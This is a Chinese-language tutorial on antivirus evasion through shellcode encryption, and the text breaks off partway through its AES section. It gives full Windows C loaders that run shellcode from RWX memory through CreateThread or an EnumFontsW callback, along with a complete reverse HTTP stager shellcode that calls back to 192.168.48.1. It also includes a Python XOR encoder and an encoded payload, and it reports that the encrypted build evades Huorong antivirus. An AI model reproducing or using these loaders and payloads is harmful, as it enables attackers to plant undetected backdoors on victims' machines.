前言
shellcode加密是shellcode混淆的一种手段。shellcode混淆手段有多种:加密(编码)、偏移量混淆、UUID混淆、IPv4混淆、MAC混淆等。
随着杀毒软件的不断进化,其检测方式早已超越传统的静态特征分析。现代杀软往往会在受控的虚拟环境中执行可疑文件,并通过挂钩(hook)方式拦截并跟踪 API 调用,以此判断程序行为是否合法。更先进的产品(例如卡巴斯基)甚至具备内存扫描能力,这使得 shellcode 在内存中一旦被解密后就可能立即暴露,显著增加了免杀的复杂度。
在这种背景下,单纯依靠 shellcode 混淆已难以完全绕过所有检测机制。然而,这并不意味着混淆技术已经失效。相反,在整个免杀流程中,静态免杀始终是第一道门槛。只有先规避静态检测,后续的沙箱对抗、动态行为规避、内存防护等策略才有实施的空间。因此,shellcode 的混淆技术在静态免杀中仍然占据极其重要的地位,是免杀体系中不可或缺的一环。
在掌握了混淆技术后,再进一步结合动态免杀手段,才能更高效地规避当前主流杀软的综合防御体系,从而提升整体的免杀成功率。
shellcode加密类型
Shellcode 加密是指将原始的 shellcode 使用某种加密算法(如 XOR、AES、RC4 等)处理,使其内容看起来不像恶意代码,隐藏真实指令内容,是为了对抗杀软检测,尤其是静态查杀、行为分析、特征提取等机制。
下面是一些高效实用的加密类型(按免杀实战效果排序):
|
|
|
|
|
|---|---|---|---|
| XOR(变种) |
|
|
|
| AES(ECB/CBC) |
|
|
|
| RC4/RC4Drop |
|
|
|
| Base64/Base32 |
|
|
|
| Custom算法(自定义加密) |
|
|
|
| Curve25519 + ChaCha20 |
|
|
|
| Shikata Ga Nai / polymorphic encoder |
|
|
|
实现过程
1、生成shellcode
2、把shellcode加密
3、构造shellcode加载器:把刚才加密后的shellcode解密并加载执行
4、编译exe
XOR异或加密
1、首先写一个以创建线程的方式加载shellcode的加载器
intmain(){// Shellcode 以 unsigned char 数组形式存储unsigned char shellcode[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x5dx11x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx64x33x64x62x00xf5x94xfaxd2xeex16xe8xb9xf9x8fx0fx9fxc3xe9x41x35xe7x40xc2x70xc2x50x6fxeexc6x0axf5xb7x6fx6cx82xd1x2dx49x14x72xb9x8bxf7xa7xc5x43x17x2dx96x3cx97x61x77x35xd4xadx07xc1x1bxaex6ex7bx04x8fx16x7cx45x75x41xafx52x36x8bx30x64xefx12x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x29x20x4cx42x42x52x4fx57x53x45x52x0dx0ax00xd8x1dx49xcdx7cx67xd4x35x0axcdx0bx6fx43xb8x2dx58x61xd6x49x96xe8x8axc9x00xd6x78xbdxcex7exe8xe6xd3x0cx4fxe3x8axccx11x7bx4ex34xfdx8dxa4xf0xdex80x20x4ax98x17x3axd2xa4x8ax68xcex78xa7xb6xd7x46x52x70x9ex6axf9xcbx62xb9xa7xeaxafxd1xfax0cxb5x89x98x3dx58xe4x0cx7fxa0x0exb9x56x42x5cx82x89xd9x01x94xc2x4cxd9x8bx5bx53x9ex33x42x2fx4ex21xcexb4xa8x0bx14x91x95x65x8ax4bx68xeexe0x90xedxc5xa1x85x04x89x2exc0xa0x14x94xc1x60xb2x3axa3x36x17x6ex0axe8xa5xc8xe2x9cx42xcdx8ax2exf5xf6xbbx68x34x73xf7x9bx69x0cxf5x97xc8x4ax4ax59x44x63x43x2bx91xc9xa0x25x41xa2xdfx26x98xf9x53xbex1cxc8x6dxe8x24x34xd8x9ax72x21xf1x57xe2x81x9dx35x62x0bx91x3fx3dxa5x3ex83xb7x60x9ax20xd9xb7xa4x69x96x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex34x38x2ex31x00x00x0ax2cx2a";// 分配可执行内存LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (mem == NULL) {return 1;}// 复制 Shellcode 到分配的内存memcpy(mem, shellcode, sizeof(shellcode));// 创建线程执行 ShellcodeHANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);if (thread == NULL) {VirtualFree(mem, 0, MEM_RELEASE);return 1;}// 等待线程执行完成WaitForSingleObject(thread, INFINITE);// 清理CloseHandle(thread);VirtualFree(mem, 0, MEM_RELEASE);return 0;}
测试,可以正常上线
编译出来,火绒直接秒
2、将shellcode进行XOR异或加密,密钥是字符串“kun”
raw_shellcode = b"xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x5dx11x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx64x33x64x62x00xf5x94xfaxd2xeex16xe8xb9xf9x8fx0fx9fxc3xe9x41x35xe7x40xc2x70xc2x50x6fxeexc6x0axf5xb7x6fx6cx82xd1x2dx49x14x72xb9x8bxf7xa7xc5x43x17x2dx96x3cx97x61x77x35xd4xadx07xc1x1bxaex6ex7bx04x8fx16x7cx45x75x41xafx52x36x8bx30x64xefx12x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x29x20x4cx42x42x52x4fx57x53x45x52x0dx0ax00xd8x1dx49xcdx7cx67xd4x35x0axcdx0bx6fx43xb8x2dx58x61xd6x49x96xe8x8axc9x00xd6x78xbdxcex7exe8xe6xd3x0cx4fxe3x8axccx11x7bx4ex34xfdx8dxa4xf0xdex80x20x4ax98x17x3axd2xa4x8ax68xcex78xa7xb6xd7x46x52x70x9ex6axf9xcbx62xb9xa7xeaxafxd1xfax0cxb5x89x98x3dx58xe4x0cx7fxa0x0exb9x56x42x5cx82x89xd9x01x94xc2x4cxd9x8bx5bx53x9ex33x42x2fx4ex21xcexb4xa8x0bx14x91x95x65x8ax4bx68xeexe0x90xedxc5xa1x85x04x89x2exc0xa0x14x94xc1x60xb2x3axa3x36x17x6ex0axe8xa5xc8xe2x9cx42xcdx8ax2exf5xf6xbbx68x34x73xf7x9bx69x0cxf5x97xc8x4ax4ax59x44x63x43x2bx91xc9xa0x25x41xa2xdfx26x98xf9x53xbex1cxc8x6dxe8x24x34xd8x9ax72x21xf1x57xe2x81x9dx35x62x0bx91x3fx3dxa5x3ex83xb7x60x9ax20xd9xb7xa4x69x96x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex34x38x2ex31x00x00x0ax2cx2a"key = b"kun"encoded = bytes([b ^ key[i % len(key)] for i, b in enumerate(raw_shellcode)])print(", ".join(f"0x{b:02x}" for b in encoded))
加密后的shellcode
3、改造刚才的加载器,使其在内存中解密并执行shellcode
// 使用字符串 "kun" 作为 XOR keyunsigned char xor_key[] = { 'k', 'u', 'n' };const size_t key_len = sizeof(xor_key);// XOR混淆的 shellcode(请用你的真实 shellcode 替换)unsigned char encoded_shellcode[] = {0x97, 0x3d, 0xed, 0x8f, 0x85, 0x86, 0xa3, 0x75, 0x6e, 0x6b, 0x34, 0x3f, 0x2a, 0x25, 0x3c, 0x3a, 0x23, 0x26, 0x5a, 0xa7, 0x0b, 0x23, 0xfe, 0x3c, 0x0b, 0x3d, 0xe5, 0x39, 0x6d, 0x26, 0xe0, 0x27, 0x4e, 0x23, 0xfe, 0x1c, 0x3b, 0x3d, 0x61, 0xdc, 0x3f, 0x24, 0x26, 0x44, 0xa7, 0x23, 0x44, 0xae, 0xc7, 0x49, 0x0f, 0x17, 0x77, 0x42, 0x4b, 0x34, 0xaf, 0xa2, 0x78, 0x2f, 0x6a, 0xb4, 0x8c, 0x86, 0x27, 0x2f, 0x3a, 0x3d, 0xe5, 0x39, 0x55, 0xe5, 0x29, 0x49, 0x26, 0x6a, 0xa5, 0x08, 0xea, 0x0d, 0x76, 0x60, 0x77, 0x1b, 0x19, 0xfe, 0xee, 0xe3, 0x75, 0x6e, 0x6b, 0x3d, 0xeb, 0xab, 0x01, 0x09, 0x23, 0x74, 0xbe, 0x3b, 0xfe, 0x26, 0x73, 0x31, 0xe5, 0x2b, 0x55, 0x27, 0x6a, 0xa5, 0x8d, 0x3d, 0x3d, 0x91, 0xa2, 0x34, 0xe5, 0x5f, 0xfd, 0x26, 0x6a, 0xa3, 0x23, 0x5a, 0xbc, 0x26, 0x5a, 0xb5, 0xc2, 0x2a, 0xb4, 0xa7, 0x66, 0x34, 0x6f, 0xaa, 0x4d, 0x8e, 0x1e, 0x84, 0x22, 0x68, 0x39, 0x4a, 0x63, 0x30, 0x57, 0xba, 0x00, 0xb6, 0x33, 0x31, 0xe5, 0x2b, 0x51, 0x27, 0x6a, 0xa5, 0x08, 0x2a, 0xfe, 0x62, 0x23, 0x31, 0xe5, 0x2b, 0x69, 0x27, 0x6a, 0xa5, 0x2f, 0xe0, 0x71, 0xe6, 0x23, 0x74, 0xbe, 0x2a, 0x2d, 0x2f, 0x33, 0x2b, 0x37, 0x31, 0x34, 0x36, 0x2a, 0x2c, 0x2f, 0x31, 0x3d, 0xed, 0x87, 0x55, 0x2f, 0x39, 0x8a, 0x8e, 0x33, 0x34, 0x37, 0x31, 0x3d, 0xe5, 0x79, 0x9c, 0x21, 0x94, 0x8a, 0x91, 0x36, 0x1f, 0x6e, 0x22, 0xcb, 0x19, 0x02, 0x1b, 0x07, 0x05, 0x10, 0x1a, 0x6b, 0x34, 0x38, 0x22, 0xfc, 0x88, 0x27, 0xfc, 0x9f, 0x2a, 0xcf, 0x22, 0x1c, 0x53, 0x69, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0x26, 0x5a, 0xa7, 0x23, 0x5a, 0xb5, 0x23, 0x5a, 0xbc, 0x2f, 0x3b, 0x34, 0x3e, 0x2a, 0xcf, 0x54, 0x3d, 0x0c, 0xc9, 0x94, 0xa0, 0x85, 0x18, 0x2f, 0x26, 0xe2, 0xb4, 0x2f, 0xd3, 0x28, 0x7f, 0x6b, 0x75, 0x23, 0x5a, 0xbc, 0x2f, 0x3a, 0x34, 0x3f, 0x01, 0x76, 0x2f, 0x3a, 0x34, 0xd4, 0x3c, 0xfc, 0xf1, 0xad, 0x8a, 0xbb, 0x80, 0x2c, 0x35, 0x23, 0xfc, 0xaf, 0x23, 0x44, 0xbc, 0x22, 0xfc, 0xb6, 0x26, 0x44, 0xa7, 0x39, 0x1d, 0x6e, 0x69, 0x35, 0xea, 0x39, 0x27, 0x2f, 0xd1, 0x9e, 0x3b, 0x45, 0x4e, 0x91, 0xbe, 0x3d, 0xe7, 0xad, 0x3d, 0xed, 0xa8, 0x25, 0x04, 0x61, 0x2a, 0x26, 0xe2, 0x84, 0x26, 0xe2, 0xaf, 0x27, 0xac, 0xb5, 0x91, 0x94, 0x8a, 0x91, 0x26, 0x44, 0xa7, 0x39, 0x27, 0x2f, 0xd1, 0x58, 0x68, 0x73, 0x0e, 0x91, 0xbe, 0xf0, 0xae, 0x64, 0xf0, 0xf3, 0x6a, 0x75, 0x6e, 0x23, 0x8a, 0xa1, 0x64, 0xf1, 0xe2, 0x6a, 0x75, 0x6e, 0x80, 0xa6, 0x87, 0x8f, 0x74, 0x6e, 0x6b, 0x9d, 0xcc, 0x94, 0x8a, 0x91, 0x44, 0x11, 0x5d, 0x0f, 0x17, 0x6e, 0x9e, 0xe1, 0x94, 0xb9, 0x9b, 0x78, 0x83, 0xcc, 0x97, 0xe4, 0x7a, 0xf1, 0xa8, 0x9c, 0x2f, 0x5e, 0x92, 0x2e, 0xa9, 0x05, 0xac, 0x3b, 0x1a, 0x80, 0xad, 0x7f, 0x9b, 0xdc, 0x1a, 0x02, 0xe9, 0xa4, 0x43, 0x22, 0x61, 0x1c, 0xd2, 0xfe, 0x99, 0xcc, 0xb0, 0x2d, 0x7c, 0x58, 0xf8, 0x57, 0xe2, 0x0f, 0x1c, 0x40, 0xba, 0xc6, 0x72, 0xaf, 0x70, 0xdb, 0x00, 0x10, 0x71, 0xe1, 0x7d, 0x09, 0x2b, 0x1e, 0x34, 0xc1, 0x39, 0x43, 0xe5, 0x5b, 0x11, 0x81, 0x79, 0x75, 0x3b, 0x18, 0x10, 0x1c, 0x46, 0x34, 0x09, 0x0e, 0x1b, 0x1a, 0x51, 0x55, 0x23, 0x04, 0x0f, 0x07, 0x07, 0x19, 0x0f, 0x44, 0x40, 0x40, 0x5b, 0x55, 0x46, 0x08, 0x1a, 0x03, 0x1b, 0x14, 0x1a, 0x02, 0x17, 0x02, 0x0e, 0x4e, 0x4e, 0x26, 0x26, 0x27, 0x2e, 0x55, 0x57, 0x45, 0x45, 0x55, 0x4b, 0x22, 0x07, 0x05, 0x11, 0x01, 0x1c, 0x06, 0x4e, 0x25, 0x21, 0x4e, 0x5d, 0x5b, 0x5f, 0x50, 0x55, 0x3a, 0x19, 0x1c, 0x0a, 0x0e, 0x1b, 0x1a, 0x44, 0x40, 0x40, 0x5b, 0x5c, 0x4e, 0x27, 0x37, 0x2c, 0x39, 0x3a, 0x39, 0x38, 0x30, 0x3c, 0x66, 0x7f, 0x6e, 0xb3, 0x68, 0x27, 0xa6, 0x09, 0x09, 0xbf, 0x40, 0x64, 0xa6, 0x7e, 0x01, 0x28, 0xcd, 0x43, 0x33, 0x14, 0xb8, 0x22, 0xe3, 0x86, 0xe1, 0xbc, 0x6e, 0xbd, 0x0d, 0xd3, 0xa5, 0x0b, 0x86, 0x8d, 0xa6, 0x62, 0x24, 0x96, 0xe4, 0xa7, 0x64, 0x15, 0x25, 0x41, 0x93, 0xe6, 0xd1, 0x9e, 0xb5, 0xf5, 0x4e, 0x21, 0xed, 0x79, 0x51, 0xa7, 0xca, 0xe1, 0x1d, 0xa0, 0x13, 0xd2, 0xd8, 0xbc, 0x33, 0x3c, 0x1b, 0xeb, 0x04, 0x92, 0xbe, 0x0c, 0xd2, 0xd2, 0x84, 0xc4, 0xa4, 0x94, 0x67, 0xc0, 0xe7, 0xf3, 0x48, 0x36, 0x8f, 0x79, 0x11, 0xcb, 0x7b, 0xd7, 0x3d, 0x37, 0x32, 0xe9, 0xfc, 0xb7, 0x6a, 0xe1, 0xac, 0x27, 0xac, 0xe5, 0x30, 0x26, 0xf0, 0x58, 0x37, 0x41, 0x25, 0x54, 0xa0, 0xdf, 0xdd, 0x65, 0x7f, 0xe4, 0xfb, 0x0e, 0xff, 0x25, 0x03, 0x9b, 0x8e, 0xfb, 0x98, 0xab, 0xca, 0xf0, 0x6a, 0xe2, 0x5b, 0xae, 0xcb, 0x61, 0xfa, 0xaa, 0x15, 0xdc, 0x51, 0xd6, 0x58, 0x7c, 0x1b, 0x64, 0x83, 0xd0, 0xa6, 0x89, 0xe9, 0x2c, 0xa6, 0xff, 0x40, 0x9e, 0x83, 0xd5, 0x03, 0x41, 0x1d, 0x9c, 0xee, 0x07, 0x67, 0x80, 0xf9, 0xa3, 0x3f, 0x24, 0x32, 0x31, 0x0d, 0x28, 0x5e, 0xff, 0xa2, 0xd5, 0x4b, 0x2a, 0xd7, 0xb1, 0x4d, 0xed, 0x97, 0x38, 0xcb, 0x72, 0xa3, 0x18, 0x86, 0x4f, 0x41, 0xb6, 0xf1, 0x07, 0x4f, 0x9a, 0x22, 0x8c, 0xea, 0xe8, 0x5b, 0x09, 0x7e, 0xff, 0x54, 0x48, 0xcb, 0x55, 0xf6, 0xd9, 0x0b, 0xef, 0x4e, 0xb2, 0xc2, 0xca, 0x02, 0xe3, 0x6e, 0x2a, 0xcb, 0x9e, 0xde, 0xd7, 0x38, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0xd4, 0x6b, 0x75, 0x2e, 0x6b, 0x34, 0xd6, 0x6b, 0x65, 0x6e, 0x6b, 0x34, 0xd7, 0x2b, 0x75, 0x6e, 0x6b, 0x34, 0xd4, 0x33, 0xd1, 0x3d, 0x8e, 0x8a, 0xbb, 0x23, 0xe6, 0x3d, 0x38, 0x3d, 0xe7, 0x8c, 0x3d, 0xe7, 0x9a, 0x3d, 0xe7, 0xb1, 0x34, 0xd6, 0x6b, 0x55, 0x6e, 0x6b, 0x3c, 0xe7, 0x92, 0x34, 0xd4, 0x79, 0xe3, 0xe7, 0x89, 0x8a, 0xbb, 0x23, 0xf6, 0xaa, 0x4b, 0xf0, 0xae, 0x1f, 0xc3, 0x08, 0xe0, 0x72, 0x26, 0x6a, 0xb6, 0xeb, 0xab, 0x00, 0xb9, 0x33, 0x2d, 0x36, 0x23, 0x70, 0x6e, 0x6b, 0x75, 0x6e, 0x3b, 0xb6, 0x86, 0xf4, 0x88, 0x91, 0x94, 0x44, 0x57, 0x59, 0x5b, 0x5f, 0x5d, 0x4d, 0x40, 0x5f, 0x4d, 0x40, 0x5a, 0x75, 0x6e, 0x61, 0x59, 0x44};size_t shellcode_len = sizeof(encoded_shellcode);intmain(){// 申请 RWX 内存LPVOID exec_mem = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!exec_mem) {printf("VirtualAlloc failed.n");return -1;}// 复制加密的 shellcode 到可执行内存memcpy(exec_mem, encoded_shellcode, shellcode_len);// 在已加载的内存中解密 shellcodefor (size_t i = 0; i < shellcode_len; ++i) {((unsigned char*)exec_mem)[i] ^= xor_key[i % key_len];}// 创建线程执行 shellcodeHANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);if (!hThread) {printf("CreateThread failed.n");VirtualFree(exec_mem, 0, MEM_RELEASE);return -1;}// 等待 shellcode 执行完成WaitForSingleObject(hThread, INFINITE);// 清理VirtualFree(exec_mem, 0, MEM_RELEASE);return 0;}
注意!在改造加载器时,必须确保硬编码在其中的 shellcode 是以加密形式存储的。否则极易被杀软扫描到明文特征。在正确的加载流程中,shellcode 的解密操作应在其写入内存(通常使用 memcpy 或等效方式)之后进行;若在写入前提前解密,等同于将明文代码暴露在磁盘或可见内存中,这无异于“裸奔”。
运行测试,能上线,说明代码没问题
打包编译出来,火绒不再查杀,可以正常上线!
AES加密
1、同样,先写一个加载器,这里使用回调函数执行shellcode
intmain(){unsigned char shellcode[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x5dx11x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx64x33x64x62x00xf5x94xfaxd2xeex16xe8xb9xf9x8fx0fx9fxc3xe9x41x35xe7x40xc2x70xc2x50x6fxeexc6x0axf5xb7x6fx6cx82xd1x2dx49x14x72xb9x8bxf7xa7xc5x43x17x2dx96x3cx97x61x77x35xd4xadx07xc1x1bxaex6ex7bx04x8fx16x7cx45x75x41xafx52x36x8bx30x64xefx12x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x29x20x4cx42x42x52x4fx57x53x45x52x0dx0ax00xd8x1dx49xcdx7cx67xd4x35x0axcdx0bx6fx43xb8x2dx58x61xd6x49x96xe8x8axc9x00xd6x78xbdxcex7exe8xe6xd3x0cx4fxe3x8axccx11x7bx4ex34xfdx8dxa4xf0xdex80x20x4ax98x17x3axd2xa4x8ax68xcex78xa7xb6xd7x46x52x70x9ex6axf9xcbx62xb9xa7xeaxafxd1xfax0cxb5x89x98x3dx58xe4x0cx7fxa0x0exb9x56x42x5cx82x89xd9x01x94xc2x4cxd9x8bx5bx53x9ex33x42x2fx4ex21xcexb4xa8x0bx14x91x95x65x8ax4bx68xeexe0x90xedxc5xa1x85x04x89x2exc0xa0x14x94xc1x60xb2x3axa3x36x17x6ex0axe8xa5xc8xe2x9cx42xcdx8ax2exf5xf6xbbx68x34x73xf7x9bx69x0cxf5x97xc8x4ax4ax59x44x63x43x2bx91xc9xa0x25x41xa2xdfx26x98xf9x53xbex1cxc8x6dxe8x24x34xd8x9ax72x21xf1x57xe2x81x9dx35x62x0bx91x3fx3dxa5x3ex83xb7x60x9ax20xd9xb7xa4x69x96x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex34x38x2ex31x00x00x0ax2cx2a";int ShellcodeSize = sizeof(shellcode);// 使用标准 VirtualAlloc 而非 lazy_importerchar* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);return 0;}
测试,可以正常上线,说明代码没问题
打包出来,火绒直接秒
2、同样,先将shellcode进行aes加密处理,使用下面c++脚本进行处理
using namespace std;intmain() {unsigned char buf[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x5dx11x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx64x33x64x62x00xf5x94xfaxd2xeex16xe8xb9xf9x8fx0fx9fxc3xe9x41x35xe7x40xc2x70xc2x50x6fxeexc6x0axf5xb7x6fx6cx82xd1x2dx49x14x72xb9x8bxf7xa7xc5x43x17x2dx96x3cx97x61x77x35xd4xadx07xc1x1bxaex6ex7bx04x8fx16x7cx45x75x41xafx52x36x8bx30x64xefx12x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x2